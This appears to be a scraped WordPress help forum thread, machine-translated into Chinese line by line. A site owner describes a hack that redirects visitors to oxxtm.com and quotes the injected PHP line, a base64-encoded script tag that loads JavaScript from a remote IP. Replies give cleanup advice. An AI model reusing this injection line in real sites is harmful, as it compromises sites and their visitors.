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[英]My website keeps redirect to another site due to oxxtm.com virus in wordpress?

Every time I open my website it automatically redirects me to another site "www.oxxtm.com". 每次我打开网站时,它都会自动将我重定向到另一个网站“ www.oxxtm.com”。

I found out that there is a code inserted in the index.php and load.php 我发现在index.php和load.php中插入了一个代码

<?php echo base64_decode("PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIHNyYz0iaHR0cDovLzQ1LjM0LjEwMy42OS9pbWFnZXMvd3AtbG9nby5qcyI+PC9zY3JpcHQ+");

?> ?>

I keep erasing it but it keeps coming back. 我一直在擦除它,但是它一直在回来。

these are the things I do so far. 这些是我到目前为止所做的事情。 -Changed the wp-admin password -installed anti-malware plugin -更改了wp-admin密码-安装了反恶意软件插件

What should I do? 我该怎么办?

Download your complete site via FTP and scan the complete site using any AntiVirus. 通过FTP下载完整的站点,然后使用任何AntiVirus扫描完整的站点。 and Download latest package from wordpress and extract index.php & .htaccess and replace your files with it. 并从wordpress下载最新软件包,并提取index.php.htaccess并用它替换文件。

You site was hacked and you need to clean all "bad code". 您的网站已被黑客入侵,您需要清除所有“错误代码”。

Download from hosting folder wp-content and file wp-config.php. 从托管文件夹wp-content和文件wp-config.php下载。 Check them manually. 手动检查它们。 Search for base64_decode and delete them. 搜索base64_decode并将其删除。

Download from wordpress website archive with you Wordpress version. 从Wordpress网站存档中下载Wordpress版本。 Upload all files to hosting and upload wp-content and wp-config.php, that you cleaned. 将所有文件上传到托管,并上传您清理过的wp-content和wp-config.php。

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